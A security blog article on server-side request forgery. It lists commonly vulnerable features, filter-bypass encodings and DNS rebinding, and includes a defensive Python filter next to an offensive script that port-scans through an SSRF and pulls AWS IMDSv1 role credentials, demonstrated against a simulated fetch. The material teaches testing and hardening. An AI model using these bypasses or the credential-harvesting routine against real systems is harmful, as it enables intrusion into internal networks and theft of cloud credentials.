SSRF, Bypasses & Escalation Tips

Dekow Mohamed
2 min read

Understanding Real-World SSRF Vulnerabilities (Assumes Prior Knowledge)

Caveat: This article assumes you're already familiar with Server-Side Request Forgery (SSRF). If not, check out PortSwigger's SSRF Guide first.

Server-Side Request Forgery (SSRF) is a powerful vulnerability — especially when it leads to internal service access or cloud metadata leaks. But real-world SSRF isn’t always obvious. It often hides in features that appear harmless on the surface.

Here’s a quick breakdown of commonly vulnerable features, exploitation tips, and practical advice on navigating defenses.


Common Features Vulnerable to SSRF

Look for any functionality that fetches remote resources — these often expose SSRF:

  • URL import features (e.g., fetch PDF from a URL)
  • File upload mechanisms (especially upload-by-URL, or when the app fetches file metadata or parses the uploaded file and follows references inside it)
  • Headless browsers / HTML rendering
  • Server monitoring dashboards
  • File storage integrations (Dropbox, Google Drive, etc.)
  • Host headers or path parameters that the app reuses to build its own outbound requests
  • Webhooks
  • Open redirect + SSRF chains
  • Import/sync functionality

These are not guaranteed SSRF points, but they are excellent places to start.


Key Tips: Finding and Bypassing SSRF Filters

SSRF rarely works on the first try. Many apps have some basic protection. Here are some useful guidelines:

  • Server vs. client: Confirm it is the server making the request, not the browser. Use an out-of-band listener you control (e.g., Burp Collaborator) and check that the callback arrives from the target's IP rather than your own.
  • Input filters exist: Look out for:
    • IP whitelisting/blacklisting (e.g., blocking 127.0.0.1)
    • Hostname filtering
    • Basic WAFs
  • Bypass techniques:
    • Use alternate IP encodings that the resolver accepts but a string filter does not (e.g., 2130706433, 0x7f000001, 0177.0.0.1 and 127.1 all mean 127.0.0.1)
    • DNS rebinding: a hostname you control answers with a public IP when the filter checks it and with an internal IP when the server actually connects
    • Use open redirects on allowed hosts as intermediaries
    • Try localhost, [::1], 0.0.0.0, ::ffff:127.0.0.1, etc.

Also note: some firewalls block requests to internal IP ranges, but filters that compare the hostname as a string, or that resolve it once for the check and then let the HTTP client resolve it again, can often be bypassed with creative input.
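As an added example (not code from the original post), here is a small Python script that puts the string-blocklist filter described above next to a hardened check: it canonicalises inet_aton-style IP literals, resolves hostnames, range-checks every returned address and pins the result so the fetcher never resolves the name a second time. The hostnames, the static DNS table and the `RebindingResolver` are constructed for the demo; a real deployment would resolve with `socket.getaddrinfo`.

```python
import ipaddress
import re
from typing import Callable, List, Optional, Union
from urllib.parse import urlsplit

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
Resolver = Callable[[str], List[str]]  # hostname -> list of IP strings (injected so this runs offline)

# The weak check many apps ship: a string blocklist compared against the URL's hostname.
BLOCKED_HOSTS = {"127.0.0.1", "localhost", "169.254.169.254", "0.0.0.0", "::1"}

def naive_filter_allows(url: str) -> bool:
    """Vulnerable: only the exact spellings in BLOCKED_HOSTS are refused."""
    host = urlsplit(url).hostname or ""
    return host not in BLOCKED_HOSTS

_IPV4_PART = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.I)

def parse_ipv4_literal(host: str) -> Optional[ipaddress.IPv4Address]:
    """Parse the inet_aton forms a resolver accepts but a string filter misses: dotted quad,
    shortened (127.1), decimal (2130706433), hex (0x7f000001) and octal (0177.0.0.1)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        if not _IPV4_PART.match(p):
            return None
        if p.lower().startswith("0x"):
            nums.append(int(p, 16))
        elif len(p) > 1 and p[0] == "0":
            nums.append(int(p, 8))
        else:
            nums.append(int(p, 10))
    *lead, last = nums
    # inet_aton semantics: the last component fills every byte not covered by the leading ones
    if any(n > 255 for n in lead) or last >= 256 ** (4 - len(lead)):
        return None
    value = last
    for i, n in enumerate(lead):
        value |= n << (8 * (3 - i))
    return ipaddress.IPv4Address(value)

_EXTRA_INTERNAL = [ipaddress.ip_network("100.64.0.0/10")]  # CGNAT; is_private misses it on older Pythons

def is_internal(ip: IPAddr) -> bool:
    """True for addresses an SSRF filter should refuse: loopback, RFC 1918, link-local (cloud metadata), etc."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still 127.0.0.1
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified or any(ip in net for net in _EXTRA_INTERNAL))

def safe_target(url: str, resolver: Resolver) -> Optional[str]:
    """Hardened gate: return the one IP the fetcher must connect to, or None if the URL is refused.
    The caller connects to this pinned IP (still sending the original Host header) instead of
    resolving the name again, so a DNS rebinding answer on a second lookup is never used."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return None
    literal = parse_ipv4_literal(host)
    if literal is not None:
        candidates: List[IPAddr] = [literal]
    else:
        try:
            candidates = [ipaddress.ip_address(host)]  # IPv6 literal; urlsplit has stripped the brackets
        except ValueError:
            candidates = [ipaddress.ip_address(a) for a in resolver(host)]
    if not candidates or any(is_internal(ip) for ip in candidates):
        return None
    return str(candidates[0])

# Constructed DNS answers for the offline demo; a real deployment would call socket.getaddrinfo.
STATIC_DNS = {"localhost": ["127.0.0.1"], "metadata.google.internal": ["169.254.169.254"],
              "intranet.corp": ["10.0.0.5"], "example.com": ["8.8.8.8"]}

def static_resolver(host: str) -> List[str]:
    return STATIC_DNS.get(host, [])

class RebindingResolver:
    """Constructed attacker-controlled DNS: public answer first, internal answer on every later lookup."""
    def __init__(self, first: str, later: str):
        self.answers, self.calls = [first, later], 0

    def __call__(self, host: str) -> List[str]:
        answer = self.answers[min(self.calls, 1)]
        self.calls += 1
        return [answer]

def check_then_reresolve(url: str, resolver: Resolver) -> Optional[str]:
    """Vulnerable pattern: validate the name, then let the HTTP client resolve it a second time."""
    if safe_target(url, resolver) is None:
        return None
    return resolver(urlsplit(url).hostname)[0]  # second lookup: the attacker now answers 127.0.0.1

if __name__ == "__main__":
    for u in ["http://2130706433/", "http://0x7f000001/", "http://127.1/", "http://0177.0.0.1/",
              "http://[::ffff:127.0.0.1]/", "http://metadata.google.internal/", "http://example.com/"]:
        print(f"{u:35} naive_allows={naive_filter_allows(u)!s:5} hardened={safe_target(u, static_resolver)}")
    rebind = RebindingResolver("8.8.8.8", "127.0.0.1")
    print("check-then-reresolve connects to", check_then_reresolve("http://attacker.example/", rebind))
```

Every encoded loopback form passes `naive_filter_allows` and is refused by `safe_target`; the rebinding resolver shows why the hardened gate returns the pinned IP rather than a yes/no verdict: `check_then_reresolve` validates against the public answer and then connects to the internal one.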


Post-SSRF: Escalation & Impact

Finding SSRF is just the beginning. Your goal should always be to escalate:

  • Scan internal ports: Try ports like 22, 8000, 5000, etc., and compare status code, response size and timing against a port you know is closed; open, closed and filtered ports usually answer differently.
  • Access cloud metadata:
    • AWS: http://169.254.169.254/latest/meta-data/ (IMDSv1 answers plain GETs; IMDSv2 first needs a PUT to /latest/api/token and the X-aws-ec2-metadata-token header, which a GET-only SSRF usually cannot send)
    • GCP: http://metadata.google.internal/ (the computeMetadata/v1/ tree requires the Metadata-Flavor: Google request header)
  • Find admin panels:
    • Common paths: /admin, /dashboard, /monitor
    • Internal-only UIs often listen on localhost or private IPs
  • Chain SSRF with other vulns:
    • SSRF → RCE on internal apps
    • SSRF → Open Redirect → Internal Access
    • SSRF → Sensitive info leak (e.g., credentials, config files)
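Added example, not part of the original article: a Python sketch of the first two escalation steps, port discovery by comparing each probe with a known-closed port, and the IMDSv1 credential walk (role list, then the credentials document for a role). `simulated_fetch`, the open-port table and the metadata documents are constructed stand-ins for a vulnerable feature and its internal network; against a real target, `fetch` would wrap whatever request triggers the SSRF and return what the server fetched.

```python
import json
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import urlsplit

@dataclass(frozen=True)
class Response:
    status: int
    body: str
    elapsed: float  # seconds the vulnerable feature took to answer

Fetch = Callable[[str], Response]  # wraps the SSRF: hand the app a URL, get back what it fetched

# --- Constructed stand-in for a vulnerable app plus its internal network (not a real target) ---
_SIM_OPEN = {22: "SSH-2.0-OpenSSH_9.6", 5000: "<title>Internal admin</title>", 8000: "ok"}
_SIM_FILTERED = {3306}  # a firewall drops packets, so the server-side fetch hangs until its timeout
_SIM_IMDS = {  # IMDSv1 documents as the simulated instance would serve them (constructed values)
    "/latest/meta-data/iam/security-credentials/": "app-role",
    "/latest/meta-data/iam/security-credentials/app-role": json.dumps({
        "Code": "Success", "Type": "AWS-HMAC", "AccessKeyId": "ASIAEXAMPLE",
        "SecretAccessKey": "example-secret", "Token": "example-session-token",
        "Expiration": "2030-01-01T00:00:00Z"}),
}

def simulated_fetch(url: str) -> Response:
    u = urlsplit(url)
    if u.hostname == "169.254.169.254":
        body = _SIM_IMDS.get(u.path)
        return Response(200, body, 0.05) if body is not None else Response(404, "not found", 0.05)
    port = u.port or 80
    if port in _SIM_OPEN:
        return Response(200, _SIM_OPEN[port], 0.05)
    if port in _SIM_FILTERED:
        return Response(500, "upstream timeout", 3.0)
    return Response(500, "connection refused", 0.03)

# --- Escalation step 1: port discovery by differential response ---
def classify(r: Response, baseline: Response, timeout: float = 2.0) -> str:
    """Compare a probe with the answer for a known-closed port: an identical answer means closed,
    a hang until the server's own timeout means filtered, anything else means open."""
    if r.elapsed >= timeout:
        return "filtered"
    if (r.status, r.body) == (baseline.status, baseline.body):
        return "closed"
    return "open"

def scan_via_ssrf(fetch: Fetch, host: str, ports: Iterable[int], closed_port: int = 1) -> Dict[int, str]:
    baseline = fetch(f"http://{host}:{closed_port}/")
    return {p: classify(fetch(f"http://{host}:{p}/"), baseline) for p in ports}

# --- Escalation step 2: IMDSv1 credential walk (plain GETs, which is all most SSRFs can send) ---
IMDS = "http://169.254.169.254"

def imds_credentials(fetch: Fetch) -> Optional[dict]:
    """List the instance's IAM role names, then pull the temporary credentials for the first one.
    Returns None when the path is unreachable or IMDSv2 is enforced (a token-less GET gets 401)."""
    roles = fetch(f"{IMDS}/latest/meta-data/iam/security-credentials/")
    if roles.status != 200 or not roles.body.strip():
        return None
    role = roles.body.strip().splitlines()[0]
    creds = fetch(f"{IMDS}/latest/meta-data/iam/security-credentials/{role}")
    if creds.status != 200:
        return None
    data = json.loads(creds.body)
    return {k: data[k] for k in ("AccessKeyId", "SecretAccessKey", "Token", "Expiration")}

if __name__ == "__main__":
    print(scan_via_ssrf(simulated_fetch, "10.0.0.5", [22, 80, 3306, 5000, 8000]))
    print(imds_credentials(simulated_fetch))
```

The closed-port baseline matters more than any fixed list of "open" signatures: many apps wrap the fetch error in a generic 500, so the only reliable oracle is whether a probe differs from a request you know failed.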

All the best, feel free to connect with me on LinkedIn.
